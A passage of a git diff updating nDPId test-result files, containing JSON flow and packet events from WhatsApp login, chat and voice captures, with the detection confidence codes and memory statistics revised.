+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582379543,"flow_last_seen":1432582379571,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1432582379591,"flow_last_seen":1432582399306,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1432582411561,"flow_last_seen":1432582431565,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402666,"flow_last_seen":1432582402666,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1432582377898,"flow_last_seen":1432582377898,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1432582381179,"flow_last_seen":1432582385071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18995,"flow_avg_l4_payload_len":431,"midstream":1,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1432582377898,"flow_last_seen":1432582377898,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1432582381179,"flow_last_seen":1432582385071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18995,"flow_avg_l4_payload_len":431,"midstream":1,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","packets-captured":93,"packets-processed":93,"total-skipped-flows":0,"total-l4-payload-len":24799,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":51,"global_ts_msec":1432582431565} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 93/93 @@ -57,9 +57,9 @@ ~~ total active/idle flows...: 9/9 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5886624 bytes -~~ total memory freed........: 5886624 bytes -~~ total allocations/frees...: 118237/118237 +~~ total memory allocated....: 6020258 bytes +~~ total memory freed........: 6020258 bytes +~~ total allocations/frees...: 120999/120999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 475 chars ~~ json string max len.......: 2420 chars diff --git a/test/results/whatsapp_voice_and_message.pcap.out b/test/results/whatsapp_voice_and_message.pcap.out index 3d950a900..d60e7e3ff 100644 --- a/test/results/whatsapp_voice_and_message.pcap.out +++ b/test/results/whatsapp_voice_and_message.pcap.out @@ -4,80 +4,80 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432820558921,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820558921,"pkt":"ABoRAAACABoRAAABCABFAAA89o5AAEAGzkgKCAABuK2zLoqYAbsGFK3rAAAAAKACOQj9WQAAAgQFtAQCCAoABFtlAAAAAAEDAwQ="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432820558982,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820558982,"pkt":"ABoRAAACABoRAAABCABFAAAoAAJAABAG9Om4rbMuCggAAQG7ipj561IUBhSt7FAS\/\/+tmQAA"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432820558982,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820558982,"pkt":"ABoRAAACABoRAAABCABFAAAo9o9AAEAGzlsKCAABuK2zLoqYAbsGFK3s+etSFVAQOQh0kgAA"} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820558921,"flow_last_seen":1432820559129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432820559129,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820558921,"flow_last_seen":1432820559129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432820559129,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567259,"flow_last_seen":1432820567259,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820567259,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432820567259,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820567259,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARvE0KCAABHw1UMNF0DZYAhk4lAAMAaiESpEIAANFg4Ox4XqyZamxAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567259,"flow_last_seen":1432820567259,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820567259,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567259,"flow_last_seen":1432820567259,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820567259,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432820567597,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432820567597,"pkt":"ABoRAAACABoRAAABCABFAABIAA5AABAR7VEfDVQwCggAAQ2W0XQANI6xAQMAGCESpEIAANFg4Ox4XqyZamwAIAAIAAHzk56wzx5AAgAIAAABTZrCzrs="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1432820567597,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820567597,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARvE0KCAABHw1UMNF0DZYAhk4lAAMAaiESpEIAANFg4Ox4XqyZamxAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567917,"flow_last_seen":1432820567917,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820567917,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1432820567917,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820567917,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARxk0KCAABHw1KMNF0DZYAhknAAAMAaiESpEIAABwXmwtuMPN7N0hAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567917,"flow_last_seen":1432820567917,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820567917,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567917,"flow_last_seen":1432820567917,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820567917,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1432820568117,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432820568117,"pkt":"ABoRAAACABoRAAABCABFAABIABBAABAR908fDUowCggAAQ2W0XQANMmPAQMAGCESpEIAABwXmwtuMPN7N0gAIAAIAAGyFZ6wzx5AAgAIAAABTZrC0PY="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1432820568118,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820568118,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARxk0KCAABHw1KMNF0DZYAhknAAAMAaiESpEIAABwXmwtuMPN7N0hAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820568346,"flow_last_seen":1432820568346,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820568346,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1432820568346,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820568346,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEAR0E0KCAABHw1AMNF0DZYAhjyrAAMAaiESpEIAAKkWq28lYULzqlFAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820568346,"flow_last_seen":1432820568346,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820568346,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820568346,"flow_last_seen":1432820568346,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820568346,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1432820568646,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432820568646,"pkt":"ABoRAAACABoRAAABCABFAABIABJAABARAU4fDUAwCggAAQ2W0XQANK\/IAQMAGCESpEIAAKkWq28lYULzqlEAIAAIAAG83p6wzx5AAgAIAAABTZrC0t8="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1432820568646,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820568646,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEAR0E0KCAABHw1AMNF0DZYAhjyrAAMAaiESpEIAAKkWq28lYULzqlFAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820568947,"flow_last_seen":1432820568947,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820568947,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1432820568947,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820568947,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARCI0KCAABrfx5AdF0DZYAhjqZAAMAaiESpEIAAJtQaIETIh2AbQlAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} -00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820568947,"flow_last_seen":1432820568947,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820568947,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820568947,"flow_last_seen":1432820568947,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820568947,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1432820569197,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432820569197,"pkt":"ABoRAAACABoRAAABCABFAABIABRAABAROYut\/HkBCggAAQ2W0XQANOG6AQMAGCESpEIAAJtQaIETIh2AbQkAIAAIAAGGsp6wzx5AAgAIAAABTZrC1Qc="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1432820569197,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820569197,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARCI0KCAABrfx5AdF0DZYAhjqZAAMAaiESpEIAAJtQaIETIh2AbQlAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820569427,"flow_last_seen":1432820569427,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820569427,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1432820569427,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820569427,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARvB0KCAABszzAMNF0DZYAhkLTAAMAaiESpEIAALo2Lkt1PTwMswhAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 